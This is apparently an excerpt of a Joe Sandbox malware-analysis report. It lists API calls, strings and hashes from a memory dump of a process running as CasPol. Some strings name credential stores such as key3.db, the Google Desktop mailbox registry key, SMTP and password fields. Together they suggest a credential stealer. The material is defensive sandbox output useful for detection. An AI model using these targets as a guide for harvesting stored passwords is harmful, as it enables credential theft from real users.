• memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: memcpymemset
• String ID: gj
• API String ID: 1297977491-4203073231
APIs
  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
• memset.MSVCRT ref: 0040AB9C
  • Part of subcall function 00411004: memcpy.MSVCRT(?,<,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
  • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
  • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
• sprintf.MSVCRT ref: 0040ABE1
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
• String ID: <%s>%s</%s>$</item>$<item>
• API String ID: 3337535707-2769808009
APIs
• GetParent.USER32(?), ref: 004090C2
• GetWindowRect.USER32(?,?), ref: 004090CF
• GetClientRect.USER32(00000000,?), ref: 004090DA
• MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
• SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: Window$Rect$ClientParentPoints
• String ID:
• API String ID: 4247780290-0
APIs
• SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
  • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
  • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
• SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
  • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
  • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
  • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
  • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
• SetCursor.USER32 ref: 0040B9F9
• SetFocus.USER32(?), ref: 0040BA0B
• SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2374668499-0
APIs
• memset.MSVCRT ref: 0040AD5B
• memset.MSVCRT ref: 0040AD71
  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
  • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
  • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
• sprintf.MSVCRT ref: 0040ADA8
Strings
• <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76
• <%s>, xrefs: 0040ADA2
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
• String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
• API String ID: 3699762281-1998499579
APIs
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
APIs
  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
• ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
• ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
• ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
• ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
• free.MSVCRT ref: 00409B00
  • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: ??3@$free
• String ID:
• API String ID: 2241099983-0
APIs
  • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
  • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
  • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
• SetBkMode.GDI32(?,00000001), ref: 0041079E
• GetSysColor.USER32(00000005), ref: 004107A6
• SetBkColor.GDI32(?,00000000), ref: 004107B0
• SetTextColor.GDI32(?,00C00000), ref: 004107BE
• GetSysColorBrush.USER32(00000005), ref: 004107C6
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: Color$BrushClassModeNameText_strcmpimemset
• String ID:
• API String ID: 2775283111-0
APIs
• BeginDeferWindowPos.USER32(0000000A), ref: 00405F6C
  • Part of subcall function 004015F4: GetDlgItem.USER32(?,?), ref: 00401604
  • Part of subcall function 004015F4: GetClientRect.USER32(?,?), ref: 00401616
  • Part of subcall function 004015F4: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401680
• EndDeferWindowPos.USER32(?), ref: 0040602B
• InvalidateRect.USER32(?,?,00000001), ref: 00406036
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: DeferWindow$Rect$BeginClientInvalidateItem
• String ID: $
• API String ID: 2498372239-3993045852
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: winSeekFile$winTruncate1$winTruncate2
• API String ID: 885266447-2471937615
APIs
  • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D13
• GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
• CloseHandle.KERNEL32(?), ref: 00406B11
  • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
  • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT ref: 00407917
  • Part of subcall function 00407560: ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: File$??2@??3@CloseCreateHandleReadSize
• String ID: Ul@$key3.db
• API String ID: 1968906679-1563549157
• Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
• Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
• Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
• Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
APIs
• _strcmpi.MSVCRT ref: 0040E134
• _strcmpi.MSVCRT ref: 0040E14D
• _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: _strcmpi$_mbscpy
• String ID: smtp
• API String ID: 2625860049-60245459
• Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
• Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
• Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
• Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
APIs
  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
• memset.MSVCRT ref: 00408258
  • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
Strings
• Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: Close$EnumOpenmemset
• String ID: Software\Google\Google Desktop\Mailboxes
• API String ID: 2255314230-2212045309
• Opcode ID: bd388eefff722b401c994613a19154ddee7b9885900c8831656236c5d79d68fa
• Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
• Opcode Fuzzy Hash: bd388eefff722b401c994613a19154ddee7b9885900c8831656236c5d79d68fa
• Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
APIs
• memset.MSVCRT ref: 0040C28C
• SetFocus.USER32(?), ref: 0040C314
  • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: FocusMessagePostmemset
• String ID: S_@$l
• API String ID: 3436799508-4018740455
• Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
• Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
• Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
• Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
APIs
• memset.MSVCRT ref: 004092C0
• GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
• _mbscpy.MSVCRT(?,?), ref: 004092FC
Strings
• <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: PrivateProfileString_mbscpymemset
• String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
• API String ID: 408644273-3424043681
• Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
• Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
• Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
• Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
APIs
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: _mbscpy
• String ID: C^@$X$ini
• API String ID: 714388716-917056472
• Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
• Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
• Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
• Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
APIs
  • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
  • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
• CreateFontIndirectA.GDI32(?), ref: 0040101F
• SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
• SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
• String ID: MS Sans Serif
• API String ID: 3492281209-168460110
• Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
• Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
• Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
• Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
APIs
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: ClassName_strcmpimemset
• String ID: edit
• API String ID: 275601554-2167791130
• Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
• Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
• Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
• Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
APIs
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: strlen$_mbscat
• String ID: 3CD
• API String ID: 3951308622-1938365332
APIs
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: _mbscat$_mbscpy
• String ID: Password2
• API String ID: 2600922555-1856559283
APIs
• LoadLibraryA.KERNEL32(shell32.dll), ref: 00410D1C
• GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: SHGetSpecialFolderPathA$shell32.dll
• API String ID: 2574300362-543337301
APIs
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: memset
• String ID: rows deleted
• API String ID: 2221118986-571615504
APIs
• memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
• memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
• memcmp.MSVCRT ref: 0041BCA4
• memcmp.MSVCRT ref: 0041BCEC
• memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: memcpy$memcmp
• String ID:
• API String ID: 3384217055-0
APIs
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: ??2@$memset
• String ID:
• API String ID: 1860491036-0
APIs
• memset.MSVCRT ref: 004048C2
• memset.MSVCRT ref: 004048D6
• memset.MSVCRT ref: 004048EA
• memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
• memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: memset$memcpy
• String ID:
• API String ID: 368790112-0
APIs
• memset.MSVCRT ref: 0040D2C2
• memset.MSVCRT ref: 0040D2D8
• memset.MSVCRT ref: 0040D2EA
• memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
• memset.MSVCRT ref: 0040D319
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: memset$memcpy
• String ID:
• API String ID: 368790112-0
APIs
• __allrem.LIBCMT ref: 00425850
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
• __allrem.LIBCMT ref: 00425933
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
                                                                                                                                                                                    • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                                                                                                    • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                                                                                                                                                    • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                                                                                                    • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                                                                                                    • too many SQL variables, xrefs: 0042C6FD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                    • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                    • API String ID: 2221118986-515162456
                                                                                                                                                                                    • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                                                    • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                                                                                                    • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000000), ref: 0043007E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: $, $CREATE TABLE
                                                                                                                                                                                    • API String ID: 3510742995-3459038510
                                                                                                                                                                                    • Opcode ID: ec2d01fe33c012397d4d1731dfc45432bb5b9ee0a9ad26789851577151ff7e1c
                                                                                                                                                                                    • Instruction ID: b8263f634f048474639948e4306e081d81924a11902ad0262d34aeb61c893b0c
                                                                                                                                                                                    • Opcode Fuzzy Hash: ec2d01fe33c012397d4d1731dfc45432bb5b9ee0a9ad26789851577151ff7e1c
                                                                                                                                                                                    • Instruction Fuzzy Hash: C351A472D00129DFCF10CF94D541AAFB7F4EF49319F61406BE840EB205E778AA4A8B98
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                                                                                                    • memset.MSVCRT ref: 004026AD
                                                                                                                                                                                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                      • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                      • Part of subcall function 004108E5: CoTaskMemFree.OLE32(00000000), ref: 00410970
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3503910906-0
                                                                                                                                                                                    • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                                                    • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                                                                                                                    • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040C922
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                                                                                                                    • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                                                                                                                    • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3798638045-0
                                                                                                                                                                                    • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                                                                                                                    • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                                                                                                                                                    • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                                                                                                                    • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                                                                                                                                                                                      • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040B60B
                                                                                                                                                                                    • atoi.MSVCRT(?), ref: 0040B619
                                                                                                                                                                                    • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                                                                                                    • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
